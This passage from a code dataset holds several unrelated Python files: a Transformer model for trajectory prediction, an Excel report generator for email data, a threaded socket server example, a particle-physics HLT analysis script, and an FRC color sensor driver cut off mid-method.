size, self_attn, src_attn, feed_forward, dropout):\n\t\tsuper(DecoderLayer, self).__init__()\n\t\tself.size = size\n\t\tself.self_attn = self_attn\n\t\tself.src_attn = src_attn\n\t\tself.feed_forward = feed_forward\n\t\tself.sublayer = clones(SublayerConnection(size, dropout), 3)\n \n\tdef forward(self, x, memory, src_mask, tgt_mask):\n\t\t\"Follow Figure 1 (right) for connections.\"\n\t\tm = memory\n\t\tx = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, tgt_mask))\n\t\tx = self.sublayer[1](x, lambda x: self.src_attn(x, m, m, src_mask))\n\t\treturn self.sublayer[2](x, self.feed_forward)\n\n\nclass Decoder(nn.Module):\n\t\"Generic N layer decoder with masking.\"\n\tdef __init__(self, layer, N):\n\t\tsuper(Decoder, self).__init__()\n\t\tself.layers = clones(layer, N)\n\t\tself.norm = LayerNorm(layer.size)\n\t\t\n\tdef forward(self, x, memory, src_mask, tgt_mask):\n\t\tfor layer in self.layers:\n\t\t\tx = layer(x, memory, src_mask, tgt_mask)\n\t\treturn self.norm(x)\n\n\n# ---------- ENCODER/DECODER ----------\n\nclass EncoderDecoder(nn.Module):\n\t\"\"\"\n\tA standard Encoder-Decoder architecture. Base for this and many \n\tother models.\n\t\"\"\"\n\tdef __init__(self, encoder, decoder, src_embed, tgt_embed, generator=None, generator_lat=None, generator_lon=None):\n\t\tsuper(EncoderDecoder, self).__init__()\n\t\tself.encoder = encoder\n\t\tself.decoder = decoder\n\t\tself.src_embed = src_embed\n\t\tself.tgt_embed = tgt_embed\n\t\tself.generator = generator\n\t\tself.generator_lat = generator_lat\n\t\tself.generator_lon = generator_lon\n\t\t\n\tdef forward(self, src, tgt, src_mask, tgt_mask, src_grid=None, src_lon=None, src_lat=None):\n\t\t\"Take in and process masked src and target sequences.\"\n\t\treturn self.decode(self.encode(src, src_mask, src_grid, src_lon, src_lat), src_mask,\n\t\t\t\t\t\t\ttgt, tgt_mask)\n\t\n\tdef encode(self, src, src_mask, src_grid=None, src_lon=None, src_lat=None):\n\t\treturn self.encoder(self.src_embed((src, src_grid, src_lon, src_lat)), src_mask)\n\t\n\tdef decode(self, memory, src_mask, tgt, tgt_mask):\n\t\treturn self.decoder(self.tgt_embed((tgt, None, None, None)), memory, src_mask, tgt_mask)\n\n\t#def prepare_infer(self, Ty, batch_size):\n\t#\tself.ys_masks = []\n\t#\tself.Ty = Ty\n\t#\tfor i in range(Ty):\n\t#\t\tys_mask = np.ones( (i+1, i+1), dtype='uint8')\n\t#\t\tys_mask = np.tril(ys_mask, 0)\n\t#\t\tys_mask = np.repeat(ys_mask[np.newaxis, :, :], batch_size, axis=0)\n\t#\t\tys_mask = torch.from_numpy(ys_mask)\n\t#\t\tif torch.cuda.is_available():\n\t#\t\t\tys_mask = ys_mask.cuda()\n\t#\t\tself.ys_masks.append(ys_mask)\n\n\tdef infer(self, model, src, src_mask, Ty, src_grid=None, src_lon=None, src_lat=None):\n\t\tm, Tx, nx = src.shape\n\t\tmemory = model.encode(src, src_mask, src_grid, src_lon, src_lat) # [Batch 128, Tx 16, d_model 512]\n\t\tys = src[:, -1, 0:2].unsqueeze(1) # [Batch 128, ys.size(1) 1, X/Y 2]\n\t\n\t\tfor i in range(Ty):\n\t\t\tys_mask = np.ones( (ys.size(1), ys.size(1)), dtype='uint8')\n\t\t\tys_mask = np.tril(ys_mask, 0)\n\t\t\tys_mask = np.repeat(ys_mask[np.newaxis, :, :], m, axis=0)\n\t\t\tys_mask = torch.from_numpy(ys_mask)\n\t\t\tif torch.cuda.is_available():\n\t\t\t\tys_mask = ys_mask.cuda()\n\n\t\t\t#out = model.decode(memory, src_mask, ys, self.ys_masks[i]) # [Batch 128, ys.size(1), d_model 512]\n\t\t\t# Last batch is usually not of size batch_size ...\n\t\t\tout = model.decode(memory, src_mask, ys, ys_mask) # [Batch , ys.size(1), d_model 512]\n\t\t\tfut_pred = model.generator(out) # [ys.size(1), Batch 128, 
gaussian_params 5]\n\t\t\tfut_pred = fut_pred.permute(1, 0, 2) # [Batch 128, ys.size(1), gaussian_params 5]\n\t\t\tnext_y = fut_pred[:, -1, 0:2].unsqueeze(1) # [Batch 128, 1, muX/muY 2]\n\t\t\tys = torch.cat( (ys, next_y), dim=1) # [Batch 128, ys.size(1)+1, 2]\n\t\n\t\tfut_pred = fut_pred.permute(1, 0, 2) # [Ty 25, Batch 128, 5]\n\t\treturn fut_pred\n\n\n# ---------- GENERATOR: for final output ----------\n\nclass Generator(nn.Module):\n\t\"Define linear + outputActivation generation step (bivariate Gaussian params).\"\n\tdef __init__(self, d_model, tgt_params):\n\t\tsuper(Generator, self).__init__()\n\t\tself.proj = nn.Linear(d_model, tgt_params)\n\n\tdef forward(self, x):\n\t\t# params: [batch 128, Ty 25, bivariate gaussian params 5] \n\t\tfut_pred = self.proj(x)\n\t\t# fut_pred: [Ty 25, batch 128, 5] via permute\n\t\tfut_pred = fut_pred.permute(1, 0, 2)\n\t\tfut_pred = outputActivation(fut_pred)\n\t\t# fut_pred: [Ty 25, batch 128, bivariate gaussian params 5] via outputActivation which enforces pred constraints\n\t\treturn fut_pred\n\t\t#return F.log_softmax(self.proj(x), dim=-1)\n\nclass GeneratorLat(nn.Module):\n\t\"Define standard linear + softmax generation step.\"\n\tdef __init__(self, d_model, tgt_lat_classes):\n\t\tsuper(GeneratorLat, self).__init__()\n\t\t# 3 classes: right, left, none\n\t\tself.proj = nn.Linear(d_model, tgt_lat_classes)\n\n\tdef forward(self, x):\n\t\tlat_pred = F.softmax(self.proj(x), dim=-1) # [Batch 128, Ty, 3]\n\t\tlat_pred = lat_pred[:, -1, :]\n\t\tlat_pred = torch.squeeze(lat_pred)\n\t\treturn lat_pred # [Batch 128, 3]\n\nclass GeneratorLon(nn.Module):\n\t\"Define standard linear + softmax generation step.\"\n\tdef __init__(self, d_model, tgt_lon_classes):\n\t\tsuper(GeneratorLon, self).__init__()\n\t\t# 2 classes: braking or not\n\t\tself.proj = nn.Linear(d_model, tgt_lon_classes)\n\n\tdef forward(self, x):\n\t\tlon_pred = F.softmax(self.proj(x), dim=-1)\n\t\tlon_pred = lon_pred[:, -1, :]\n\t\tlon_pred = torch.squeeze(lon_pred)\n\t\treturn lon_pred # [Batch 128, 2]\n\n\n\n# ---------- FULL MODEL ----------\n\n# This model does not use lon/lat features as inputs\n# But predicts lon/lat maneuvers\n# DEPRECATED\ndef make_model_cls(src_feats, tgt_feats, tgt_lon_classes=2, tgt_lat_classes=3, \n\t\t\t\t\tN=6, d_model=512, d_ff=2048, h=8, dropout=0.1,\n\t\t\t\t\tsrc_ngrid=0, src_grid=(13,3), src_soc_emb_size=0):\n\t\"Helper: Construct a model from hyperparameters.\"\n\tc = copy.deepcopy\n\tattn = MultiHeadedAttention(h, d_model)\n\tff = PositionwiseFeedForward(d_model, d_ff, dropout)\n\tposition = PositionalEncoding(d_model, dropout)\n\n\tmodel = EncoderDecoder(\n\t\tEncoder(EncoderLayer(d_model, c(attn), c(ff), dropout), N),\n\t\tDecoder(DecoderLayer(d_model, c(attn), c(attn), c(ff), dropout), N),\n\t\tnn.Sequential(Embeddings(d_model, src_feats, src_ngrid, src_grid, soc_emb_size=src_soc_emb_size), c(position)),\n\t\tnn.Sequential(Embeddings(d_model, tgt_feats), c(position)),\n\t\tgenerator_lat = GeneratorLat(d_model, tgt_lat_classes),\n\t\tgenerator_lon = GeneratorLon(d_model, tgt_lon_classes))\n\t\n\t# This was important from their code. 
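(fan_avg scaling keeps the activation variance roughly constant across layers.)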
\n\t# Initialize parameters with Glorot / fan_avg.\n\tfor p in model.parameters():\n\t\tif p.dim() > 1:\n\t\t\tnn.init.xavier_uniform(p)\n\treturn model\n\n\n# This model uses lon/lat features as inputs\n# And predicts traj\n#def make_model(src_feats, tgt_feats, tgt_params=5, N=6, d_model=512, d_ff=2048, h=8, dropout=0.1,\n#def make_model(src_feats, tgt_feats, tgt_params=5, N=1, d_model=256, d_ff=1024, h=1, dropout=0.1,\ndef make_model(src_feats, tgt_feats, tgt_params=5, N=1, d_model=256, d_ff=256, h=4, dropout=0.1,\n\t\t\t src_ngrid=0, src_grid=(13,3), # for 2D image like input features\n\t\t\t src_soc_emb_size = 0,\n\t\t\t src_lon=0, src_lat=0): # additional input features (TODO: list for genericity)\n\t\"Helper: Construct a model from hyperparameters.\"\n\tc = copy.deepcopy\n\tattn = MultiHeadedAttention(h, d_model)\n\tff = PositionwiseFeedForward(d_model, d_ff, dropout)\n\tposition = PositionalEncoding(d_model, dropout)\n\n\tmodel = EncoderDecoder(\n\t\tEncoder(EncoderLayer(d_model, c(attn), c(ff), dropout), N),\n\t\tDecoder(DecoderLayer(d_model, c(attn), c(attn), c(ff), dropout), N),\n\t\tnn.Sequential(Embeddings(d_model, src_feats, src_ngrid, src_grid, src_lon, src_lat, src_soc_emb_size), c(position)),\n\t\tnn.Sequential(Embeddings(d_model, tgt_feats), c(position)),\n\t\tgenerator = Generator(d_model, tgt_params))\n\t\n\t# This was important from their code. \n\t# Initialize parameters with Glorot / fan_avg.\n\tfor p in model.parameters():\n\t\tif p.dim() > 1:\n\t\t\tnn.init.xavier_uniform(p)\n\treturn model\n\n\n# ---------- BATCH utility ----------\n\nclass Batch:\n\t\"Object for holding a batch of data with mask during training.\"\n\tdef __init__(self):\n\t\tself.src = None\n\t\tself.src_grid = None\n\t\tself.src_mask = None\n\t\tself.src_lon = None\n\t\tself.src_lat = None\n\t\tself.trg = None\n\t\tself.trg_mask = None\n\t\tself.trg_y = None\n\n\tdef transfo(self, source, target=None, source_grid=None, source_lon=None, source_lat=None):\n\t\t# We want [Batch, Tx, Nx]\n\t\tsrc = copy.copy(source)\n\t\tsrc = src.permute(1, 0, 2)\n\t\tself.src = src\n\n\t\tm, Tx, _ = src.shape\n\n\t\t# [Batch, Tx, 13, 3] for grid or [Batch, Tx, 80] for grid_soc\n\t\tsrc_grid = copy.copy(source_grid)\n\t\tself.src_grid = src_grid\n\n\t\t# encoder has full visibility on all inputs\n\t\tsrc_mask = np.ones((1, Tx), dtype='uint8')\n\t\t#src_mask[:,0] = 0\n\t\tsrc_mask = np.repeat(src_mask[np.newaxis, :, :], m, axis=0)\n\t\tself.src_mask = torch.from_numpy(src_mask)\n\n\t\tif source_lon is not None:\n\t\t\tsrc_lon = copy.copy(source_lon)\n\t\t\tsrc_lon = torch.unsqueeze(src_lon, dim=1)\n\t\t\tsrc_lon = torch.repeat_interleave(src_lon, Tx, dim=1)\n\t\t\tself.src_lon = src_lon\n\t\telse:\n\t\t\tself.src_lon = None\n\n\t\tif source_lat is not None:\n\t\t\tsrc_lat = copy.copy(source_lat)\n\t\t\tsrc_lat = torch.unsqueeze(src_lat, dim=1)\n\t\t\tsrc_lat = torch.repeat_interleave(src_lat, Tx, dim=1)\n\t\t\tself.src_lat = src_lat\n\t\telse:\n\t\t\tself.src_lat = None\n\n\t\tself.ntokens = torch.from_numpy(np.array([m*Tx]))\n\n\t\t# We want [Batch, Ty, Ny]\n\t\tif target is not None:\n\t\t\ttrg = copy.copy(target)\n\t\t\ttrg = trg.permute(1, 0, 2)\n\n\t\t\t# Create a fake Transformer \"start symbol/step\" by repeating \"end of input\" in beginning of trg\n\t\t\t# The \"start symbol\" is pretty common for NMT taks; do something similar here\n\t\t\ttrg = torch.cat((src[:,-1,:].unsqueeze(1), trg), dim=1)\n\n\t\t\tmy, Ty, ny = trg.shape\n\t\t\tassert m == my, \"src and trg batch sizes do not match\"\n\n\t\t\t# ensure 
sequentiality between input and output of decoder\n\t\t\t# y(n) depends on y(1)...y(n-1)\n\t\t\tself.trg = trg[:, :-1, :]\t# input of DECODER\n\t\t\tself.trg_y = trg[:, 1:, :] # expected output of DECODER\n\t\t\t# otherwise the decoder just \"learns\" to copy the input ...\n\t\t\t# with quickly a loss of 0 during training .....\n\t\t\t\n\t\t\t\n\t\t\t# decoder at step n, has visibility on y(1)..y(n-1)\n\t\t\ttrg_mask = np.ones((Ty-1,Ty-1), dtype='uint8')\n\t\t\ttrg_mask = np.tril(trg_mask, 0)\n\t\t\ttrg_mask = np.repeat(trg_mask[np.newaxis, :, :], m, axis=0)\n\t\t\tself.trg_mask = torch.from_numpy(trg_mask)\n\n\t\t\tif torch.cuda.is_available():\n\t\t\t\tself.trg = self.trg.cuda()\n\t\t\t\tself.trg_y = self.trg_y.cuda()\n\t\t\t\tself.trg_mask = self.trg_mask.cuda()\n\t\telse:\n\t\t\tself.trg = None\n\t\t\tself.trg_y = None\n\t\t\tself.trg_mask = None\n\n\t\t#print(\"SRC:\", self.src.shape)\n\t\t#if self.src_grid is not None:\n\t\t#\tprint(\"SRC_GRID:\", self.src_grid.shape)\n\t\t#print(\"TRG:\", self.trg.shape)\n\t\t#print(\"TRG_Y:\", self.trg_y.shape)\n\n\t\tif torch.cuda.is_available():\n\t\t\tself.src = self.src.cuda()\n\t\t\tself.src_mask = self.src_mask.cuda()\n\t\t\tif self.src_lon is not None:\n\t\t\t\tself.src_lon = self.src_lon.cuda()\n\t\t\tif self.src_lat is not None:\n\t\t\t\tself.src_lat = self.src_lat.cuda()\n\t\t\tif self.src_grid is not None:\n\t\t\t\tself.src_grid = self.src_grid.cuda()\n","sub_path":"transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":19055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"92280491","text":"import setttings \nimport xlsxwriter\nimport datetime\nimport os \nimport pandas as pd\nimport logging\n\n\nfrom pathlib import Path\nfrom time import sleep\n\nfrom csvhandle import get_outbox_email_list_per_day,get_outbox_relation_per_day\nfrom csvhandle import get_total_mail_of_a_address,get_total_mail_of_b_address\nfrom displayutils import printProgressBar\n\n\n##logging config\nlogging.basicConfig(filename='excel_report.log',level=logging.INFO)\nprint(\"inited logger\")\n####################initialization\ntry:\n email_count = 0\n file_name = setttings.EXCEL_FILE_LOC+\"Báo cáo NGK ngày \"+setttings.CURRENT_DAY+setttings.EXCEL_EXTENSION\n date = str(datetime.datetime.now().day) + \"-\" + str(datetime.datetime.now().month) + \"-\" + str(datetime.datetime.now().year) \n eml_csv = ''\n outbox_rela_as_series = pd.Series()\n\n try:\n eml_csv = pd.read_csv(os.path.join(setttings.CSV_FILE_LOC,'eml_data'+setttings.CURRENT_DAY+setttings.CSV_EXTENSION),sep=\",\")\n eml_csv = eml_csv.drop_duplicates(subset=['eml_file_name','a_address','b_address']) \n #extension = '.txt'\n outbox_rela_as_series = get_outbox_relation_per_day(eml_csv,date)\n except FileNotFoundError as e:\n print(\"\\n\\nChưa có file .csv của ngày hôm nay\\n\\n\") \n exit(1) \n\n\n\n #create workbook & wo3rksheet\n workbook = xlsxwriter.Workbook(file_name)\n main_worksheet = workbook.add_worksheet(\"Tổng quan\")\n a_address_worksheet = workbook.add_worksheet(\"Đối tượng gửi\")\n b_address_worksheet = workbook.add_worksheet(\"Đối tượng nhận\")\n #formatting stuffs\n bold = workbook.add_format({'bold':1})\n money_format = workbook.add_format({'num_format':'$#,##0'})\n date_format = workbook.add_format({'num_format':'dd mm yyyy'})\n\n #create format in merged range \n merge_format = workbook.add_format({\n 'bold' : 1,\n 'border' : 1,\n 'align' : 'center',\n 'valign' : 'vcenter',\n 'fg_color' : '#a0d0db'\n })\n 
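# the four header formats below differ only in 'fg_color'; a small factory\n    # like this could build them (illustration only, not called by this script):\n    def make_header_format(color):\n        return workbook.add_format({'bold': 1, 'border': 1, 'align': 'center',\n                                    'valign': 'vcenter', 'fg_color': color})\n\n    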
from_format = workbook.add_format({\n 'bold' : 1,\n 'border' : 1,\n 'align' : 'center',\n 'valign' : 'vcenter', \n 'fg_color' : '#dfda41'\n })\n to_format = workbook.add_format({\n 'bold' : 1,\n 'border' : 1,\n 'align' : 'center',\n 'valign' : 'vcenter', \n 'fg_color' : '#00ced8'\n })\n number_of_mails_format = workbook.add_format({\n 'bold' : 1,\n 'border' : 1,\n 'align' : 'center',\n 'valign' : 'vcenter', \n 'fg_color' : '#e68484'\n })\n location_format = workbook.add_format({\n 'bold' : 1,\n 'border' : 1,\n 'align' : 'center',\n 'valign' : 'vcenter', \n 'fg_color' : '#a8d8ba'\n })\n\n #header\n main_worksheet.write('A1','Địa chỉ gửi',from_format)\n main_worksheet.write('B1','Địa chỉ nhận',to_format)\n main_worksheet.write('C1','Số lượng thư',number_of_mails_format)\n main_worksheet.write('D1','Vị trí lưu trữ trên máy',location_format)\n main_worksheet.freeze_panes(1,0)\n row = 1\n col = 0\n\n #adjust columns width\n main_worksheet.set_column('A1:B1',30)\n main_worksheet.set_column('C1:C1',15)\n main_worksheet.set_column('D1:D1',180)\n main_worksheet.set_row(0,40)\n\n #print(outbox_rela_as_series)\n\n #initProgressBar\n printProgressBar(0,len(outbox_rela_as_series),prefix=\"Tiến độ:\",length=50)\n for i in range(0,len(outbox_rela_as_series)):\n for each_b_addr in outbox_rela_as_series[i]:\n start_pos = row\n \n main_worksheet.write(row,col,outbox_rela_as_series.index[i],from_format)\n col += 1\n main_worksheet.write(row,col,each_b_addr,to_format)\n col += 1\n main_worksheet.write(row,col,len(get_outbox_email_list_per_day(eml_csv,date,outbox_rela_as_series.index[i],each_b_addr)),number_of_mails_format)\n col += 1\n for each_mail in get_outbox_email_list_per_day(eml_csv,date,outbox_rela_as_series.index[i],each_b_addr):\n main_worksheet.write_url(row,col,each_mail)\n row += 1\n stop_pos = row-1\n col = 0\n row += 1\n main_worksheet.merge_range(start_pos,0,stop_pos,0,outbox_rela_as_series.index[i],from_format)\n main_worksheet.merge_range(start_pos,1,stop_pos,1,each_b_addr,to_format)\n main_worksheet.merge_range(start_pos,2,stop_pos,2,\n len(get_outbox_email_list_per_day(eml_csv,date,outbox_rela_as_series.index[i],\n each_b_addr)),number_of_mails_format)\n# main_worksheet.merge_range(start_pos)\n row += 1\n col = 0\n printProgressBar(i+1,len(outbox_rela_as_series),prefix=\"Tiến độ:\",length=50)\n row += 1\n col = 0\n\n ###########################\n ###########write sheet for a_address\n email_series_for_a_addr = get_total_mail_of_a_address(eml_csv,date)\n #print(email_series_for_a_addr)\n row = 1\n col = 0\n printProgressBar(0,len(outbox_rela_as_series),prefix=\"Tiến độ:\",length=50)\n for i in range(0,len(email_series_for_a_addr)):\n #remove duplicates in list \n email_series_for_a_addr[i] = list(set(email_series_for_a_addr[i]))\n a_address_worksheet.write(row,col,email_series_for_a_addr.index[i],from_format)\n col += 1\n a_address_worksheet.write(row,col,len(email_series_for_a_addr[i]),number_of_mails_format)\n col += 1\n #row += 1\n start_pos = row \n for each_mail in email_series_for_a_addr[i]: \n a_address_worksheet.write_url(row,col,each_mail)\n row += 1\n stop_pos = row-1 \n col = 0\n #row += 1\n a_address_worksheet.merge_range(start_pos,0,stop_pos,0,email_series_for_a_addr.index[i],from_format)\n a_address_worksheet.merge_range(start_pos,1,stop_pos,1,len(email_series_for_a_addr[i]),number_of_mails_format)\n #reset\n col = 0\n printProgressBar(i+1,len(outbox_rela_as_series),prefix=\"Tiến độ:\",length=50)\n\n a_address_worksheet.set_column('A1:B1',30)\n 
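# the receiver sheet written further below repeats this layout; the width and\n    # header setup could be shared by a single helper taking a worksheet.\n    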
a_address_worksheet.set_column('C1:C1',180)\n    a_address_worksheet.set_row(0,40)\n\n    a_address_worksheet.write('A1','Địa chỉ gửi',from_format)\n    a_address_worksheet.write('B1','Số lượng thư',number_of_mails_format)\n    a_address_worksheet.write('C1','Vị trí lưu trữ trên máy',location_format)\n\n\n\n    ###########################\n    ###########write sheet for b_address\n    email_series_for_b_addr = get_total_mail_of_b_address(eml_csv,date)\n    row = 1\n    col = 0\n    #printProgressBar(0,len(outbox_rela_as_series),prefix=\"Tiến độ:\",length=50)\n    for i in range(0,len(email_series_for_b_addr)):\n        b_address_worksheet.write(row,col,email_series_for_b_addr.index[i],to_format)\n        col += 1\n        b_address_worksheet.write(row,col,len(email_series_for_b_addr[i]),number_of_mails_format)\n        col += 1\n        #row += 1\n        start_pos = row \n        for each_mail in email_series_for_b_addr[i]: \n            b_address_worksheet.write_url(row,col,each_mail)\n            row += 1\n        stop_pos = row-1 \n        col = 0\n        #row += 1\n        b_address_worksheet.merge_range(start_pos,0,stop_pos,0,email_series_for_b_addr.index[i],to_format)\n        b_address_worksheet.merge_range(start_pos,1,stop_pos,1,len(email_series_for_b_addr[i]),number_of_mails_format)\n        #reset\n        col = 0\n        #printProgressBar(i+1,len(outbox_rela_as_series),prefix=\"Tiến độ:\",length=50)\n\n    b_address_worksheet.set_column('A1:B1',30)\n    b_address_worksheet.set_column('C1:C1',180)\n    b_address_worksheet.set_row(0,40)\n\n    b_address_worksheet.write('A1','Địa chỉ nhận',from_format)\n    b_address_worksheet.write('B1','Số lượng thư',number_of_mails_format)\n    b_address_worksheet.write('C1','Vị trí lưu trữ trên máy',location_format)\n\n\n    workbook.close()\n\n    print(r\"---------------------------------------------------------------\")\n    print(r\" _____ ____ __ __ _____ _ ______ _______ ______ _____\")\n    print(r\"/ ____// __ \\| \\/ | __ \\| | | ____|__ __| ____| __\\\\\")\n    print(r\"| | | | | | \\ / | |__) | | | |__ | | | |__ | | | |\")\n    print(r\"| | | | | | |\\/| | ___/| | | __| | | | __| | | | |\")\n    print(r\"| |___| |__| | | | | | | |____| |____ | | | |____| |__| |\")\n    print(r\" \\_____\\____/|_| |_|_| |______|______| |_| |______|_____/ \")\n    print(r\"---------------------------------------------------------------\") \n    \n    \n    print(\"\\n\\nHoàn thành! 
Nhấn phím bất kỳ để thoát...\\n\\n\")\n    input()\nexcept Exception as e:\n    logging.exception('[ERROR] ' + str(e))","sub_path":"get_excel_report.py","file_name":"get_excel_report.py","file_ext":"py","file_size_in_byte":8936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"313975073","text":"import socket\nimport threading\n\nsock = socket.socket()\nsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nport = 8888\nsock.bind(('0.0.0.0', port))\nsock.listen()\n\nthreadId = 0\n\nclass ReadThread(threading.Thread):\n    def __init__(self, threadName, conn):\n        threading.Thread.__init__(self)\n\n        self.threadName = threadName\n        self.msg = b''\n        self.conn = conn\n\n    def run(self):\n        print('{} starting'.format(self.threadName))\n\n        # Blocks and waits for either all or 1024 bytes of data to be received.\n        recv_data = self.conn.recv(1024)\n\n        # Keep reading the connection until there is no more.\n        while recv_data:\n            print('{} partial msg received: {}'.format(self.threadName, recv_data)) \n            self.msg += recv_data\n            recv_data = self.conn.recv(1024)\n\n        print('{} full msg received: {}'.format(self.threadName, self.msg))\n\n        # Close the connection.\n        self.conn.close()\n\nwhile True:\n    # Blocks and waits for a connection.\n    print('Main thread: starting up and waiting for input connection on {}'.format(port))\n    conn, addr = sock.accept()\n\n    threadId += 1\n    threadName = 'Thread {}'.format(threadId)\n    ReadThread(threadName, conn).start()\n\n","sub_path":"examples/sync_blocking_scale.py","file_name":"sync_blocking_scale.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"69713171","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom array import array\nimport argparse\nimport sys\nimport ROOT\nimport json\nimport re\nfrom DataFormats.FWLite import Events, Handle\nfrom Analysis.HLTAnalyserPy.EvtData import EvtData, EvtHandles,phaseII_products, add_product,get_objs\n\nimport Analysis.HLTAnalyserPy.CoreTools as CoreTools\nimport Analysis.HLTAnalyserPy.GenTools as GenTools\nimport Analysis.HLTAnalyserPy.HistTools as HistTools\n\ndef match_tkeg_index(egidx,trkegs):\n    for trkeg in trkegs:\n        if trkeg.EGRef().key()==egidx:\n            return trkeg\n    return None\n\n\ndef print_l1_region(evtdata,suffix):\n    l1egs = evtdata.get(\"l1egs{}\".format(suffix))\n    l1tkphos = evtdata.get(\"l1tkphos{}\".format(suffix))\n    l1tkeles = evtdata.get(\"l1tkeles{}\".format(suffix))\n    \n    for egidx,eg in enumerate(l1egs):\n        tkpho = match_tkeg_index(egidx,l1tkphos)\n        tkele = match_tkeg_index(egidx,l1tkeles)\n        print_str = \" {indx} {et} {eta} {phi}\".format(indx=egidx,et=eg.et(),\n                                                      eta=eg.eta(),phi=eg.phi())\n        if tkpho:\n            print_str+=\" tkpho {et} {isol} {isolPV}\".format(et = tkpho.et(),\n                                                            isol = tkpho.trkIsol(),\n                                                            isolPV = tkpho.trkIsolPV())\n        if tkele:\n            print_str+=\" tkele {et} {isol} {isolPV} {zvtx}\".format(\n                et = tkele.et(),isol = tkele.trkIsol(),isolPV = tkele.trkIsolPV(),\n                zvtx = tkele.trkzVtx())\n        print(print_str)\n\n    \ndef print_l1(evtdata,events,index):\n    events.to(index)\n    evtdata.get_handles(events)\n    print(\"barrel:\")\n    print_l1_region(evtdata,\"_eb\")\n    print(\"encap:\")\n    print_l1_region(evtdata,\"_hgcal\")\n\nif __name__ == \"__main__\":\n    \n    CoreTools.load_fwlitelibs()\n\n    parser = argparse.ArgumentParser(description='example e/gamma HLT analyser')\n    
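# command-line options are declared next; once parsed, the add_product calls\n    # below register extra FWLite handles, whose C++ type strings must match\n    # the stored branch types exactly.\n    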
parser.add_argument('in_filename',nargs=\"+\",help='input filename')\n    parser.add_argument('--prefix','-p',default='file:',help='file prefix')\n    parser.add_argument('--out','-o',default=\"output.root\",help='output filename')\n    args = parser.parse_args()\n    add_product(phaseII_products,\"countEcalRecHitsEBThres0GeV\",\"int\",\"hltEgammaHLTExtra:countEcalRecHitsEcalRecHitsEBThres0GeV\")\n    add_product(phaseII_products,\"countEcalRecHitsEBThres1GeV\",\"int\",\"hltEgammaHLTExtra:countEcalRecHitsEcalRecHitsEBThres1GeV\")\n    add_product(phaseII_products,\"ecalHitsTest\",\"edm::SortedCollection<EcalRecHit,edm::StrictWeakOrdering<EcalRecHit> >\",\"hltEcalRecHit:EcalRecHitsEB\")\n    add_product(phaseII_products,\"hgcalTest\",\"edm::SortedCollection<HGCRecHit,edm::StrictWeakOrdering<HGCRecHit> >\",\"HGCalRecHit:HGCHEBRecHits\")\n    add_product(phaseII_products,\"countHGCal1GeV\",\"int\",\"hltEgammaHLTPhase2Extra:countHgcalRecHitsHGCHEBRecHitsThres1GeV\")\n    add_product(phaseII_products,\"countHGCal0GeV\",\"int\",\"hltEgammaHLTPhase2Extra:countHgcalRecHitsHGCHEBRecHitsThres0GeV\")\n    add_product(phaseII_products,\"trig_sum\",\"trigger::TriggerEvent\",\"hltTriggerSummaryAOD::HLTX\")\n    \n    evtdata = EvtData(phaseII_products,verbose=True)\n    \n    in_filenames_with_prefix = ['{}{}'.format(args.prefix,x) for x in args.in_filename]\n    events = Events(in_filenames_with_prefix)\n    \n    print(\"number of events\",events.size())\n\n    \n#    with open(\"weights_test_qcd.json\") as f:\n#        import json\n#        weights = json.load(f)\n\n#    weighter = QCDWeightCalc(weights[\"v2\"][\"qcd\"])\n#    events.to(3)\n#    evtdata.get_handles(events)\n#    weighter.weight(evtdata)\n","sub_path":"HLTAnalyserPy/test/readPhaseII.py","file_name":"readPhaseII.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"167620315","text":"import wpilib\nimport hal\nfrom hal_impl import i2c_helpers, data\nimport typing\n\nhal_data = data.hal_data\n\nclass ColorSensorBase(wpilib.SendableBase):\n\n    def __init__(self):\n        super().__init__()\n        self.redChannel = 0\n        self.blueChannel = 0\n        self.greenChannel = 0\n\n    def getColor(self, *args, **kwargs) -> int:\n\n        raise NotImplementedError(\n            \"Implement 'getColor' in your class!\"\n        )\n\n    def getRed(self, *args, **kwargs) -> int:\n\n        raise NotImplementedError(\n            \"Implement 'getRed' in your class!\"\n        )\n\n    def getBlue(self, *args, **kwargs) -> int:\n\n        raise NotImplementedError(\n            \"Implement 'getBlue' in your class!\"\n        )\n\n    def getGreen(self, *args, **kwargs) -> int:\n\n        raise NotImplementedError(\n            \"Implement 'getGreen' in your class!\"\n        )\n\n    def initSendable(self, builder: wpilib.SendableBuilder) -> None:\n        builder.setSmartDashboardType(\"ColorSensor\")\n        builder.addDoubleProperty(\"Red\", self.getRed, None)\n        builder.addDoubleProperty(\"Blue\", self.getBlue, None)\n        builder.addDoubleProperty(\"Green\", self.getGreen, None)\n\nclass REV_Color_Sim(i2c_helpers.I2CSimBase):\n\n    def __init__(self, sensor):\n        super().__init__()\n        self.red = 0\n        self.green = 0\n        self.blue = 0\n        self.clear = 0\n\n    def initializeI2C(self, port, status):\n        self.color_key = \"rev_color_sensor_v2_%d_color\" % port\n\n    def transactionI2C(\n        self, port, deviceAddress, dataToSend, sendSize, dataReceived, receiveSize\n    ):\n        deviceAddress = 0x39\n        sendSize = 0xFF\n        receiveSize = 0xFF\n        dataReceived[0] = 0xFF\n        port = wpilib.I2C.Port.kOnboard\n\n        return 1\n\n    def readI2C(self, port, deviceAddress, buffer, count):\n        color = hal_data[\"robot\"].get(self.color_key, 0)\n        if count == 2:\n            buffer[1] = 0xFF\n            buffer[0] = 0xFF\n        elif count == 1:\n            buffer[0] = 0xFF\n\n        return count\n\nclass REV_Color_Sensor_V2(ColorSensorBase):\n\n    ADDRESS = 0x39\n\n    def __init__(self, port: wpilib.I2C.Port = 0):\n        super().__init__()\n\n        if port is None:\n            port = wpilib.I2C.Port.kOnboard\n\n        simPort = None\n        if hal.HALIsSimulation():\n            simPort = REV_Color_Sim(self)\n\n        self.i2c = wpilib.I2C(port, self.ADDRESS, simPort=simPort)\n        self.clearChannel = 0\n        self.setName(\"REV_Robotics_Color_Sensor_V2\", port)\n\n    def enable(self) -> None:\n        